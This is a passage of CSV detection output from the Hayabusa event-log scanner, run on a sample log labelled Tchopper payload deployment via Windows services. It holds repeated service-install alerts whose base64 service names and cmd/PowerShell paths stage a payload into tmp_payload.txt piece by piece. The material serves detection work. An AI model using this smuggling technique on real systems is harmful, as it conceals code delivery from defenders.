DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:26.606 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IDQuMC4gUG93ZXJzaGVsbCBpcyB0aGUgcHJvcGVydHkgb2YNCiMgICAgICAgICAgICAgICAgTWljcm9zb2Z0LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiBvbiBQb3dlcnNoZWxsIG9yIGRvd25sb2Fkcy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg9"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:28.059 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: wgc2VlIHRoZSBmb2xsb3dpbmcNCiMgICAgICAgICAgICAgICAgd2Vic2l0ZTogaHR0cHM6Ly90ZWNobmV0Lm1pY3Jvc29mdC5jb20vZW4tdXMvc2NyaXB0Y2VudGVyL2RkNzQyNDE5LmFzcHgNCiMN | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg10"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:29.523 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: CiMNCiMgQXV0aG9yczogIEphbWllIFdoZWF0b24gLy8gV2lsbGlhbSBEZWxvbmcNCiMgDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg11"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 
MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:30.978 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojDQojDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg12"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:32.440 
+09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:32.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBzY2FuIHRoZSBFdmVudCBMb2cocykgJiBkZXRlcm1pbmUgdGhlIEV2ZW50cyBQZXIgU2Vjb25kIChFUFMpLg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg13"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:33.911 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0KIw0KI0BwYXJhbSAkQWdlbnQgICAgICAgICAgLT4gIFRoZSBDb21wdXRlciAvIElQDQojQHBhcmFtICRMb2dOYW1lICAgICAgICAtPiAgVGhlIEV2ZW50IExvZyB0aGF0IHdpbGwgYmUgZXZhbHVh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg14"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service 
execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:35.365 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVkIChTZWN1cml0eSwgQXBwbGljYXRpb24sIFN5c3RlbSkNCiNAcGFyYW0gJFJlbW90ZUNvbXB1dGVyIC0+ICBUaGUgdmFsdWUgdG8gdGVsbCBpZiB0aGUgY29tcHV0ZXIgaXMgcmVtb3RlIG9yIG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg15"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:36.820 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: xvY2FsICANCiMNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCg0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg16"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: 
LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:38.273 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZnVuY3Rpb24gR2V0LUV2ZW50TG9nSW5mbyB7IHBhcmFtKCRBZ2VudCwgJExvZ05hbWUsICRSZW1vdGVDb21wdXRlciwgJE9TKQ0KDQogICAgJExvZ0luZm8gPSBAe30gICAgICAgIA0KDQogICAgIH | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg17"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:39.711 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RyeSB7ICAgICANCiAgICAgICAgICAgICAgICAgICAgICAgICAgDQogICAgICAgICMgSnVzdCBsb2NhbGhvc3QNCiAgICAgICAgSWYgKCEkUmVtb3RlQ29tcHV0ZXIpIHsgICAgICAgICANCg0KICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg18"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand 
DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:41.177 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgJFRvdGFsTG9nRXZlbnRzID0gKEdldC1XaW5FdmVudCAtTGlzdExvZyAkTG9nTmFtZSkuUmVjb3JkQ291bnQNCg0KICAgICAgICAgICAgJExvZ1NpemUgPSAoR2V0LVdpbkV2ZW50IC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg19"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:42.631 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 1MaXN0TG9nICRMb2dOYW1lKS5GaWxlU2l6ZSAvIDEwMDAwMDAgIyBTZXQgdG8gTUINCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJExvZ1NpemUgPSBbbWF0aF06OlJvdW5kKCgkTG9nU2l6ZSks | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg20"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: 
c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg21"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:15:44.099 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IDEpDQogICAgIA0KICAgICAgICAgICAgJE9sZGVzdEV2ZW50VGltZSA9IChHZXQtV2luRXZlbnQgJExvZ05hbWUgLU9sZGVzdCAtbWF4ZXZlbnRzIDEpLlRpbWVDcmVhdGVkICAgICAgICANCg0KIC | Path: c:\windows\system32\cmd.exe /c powershell 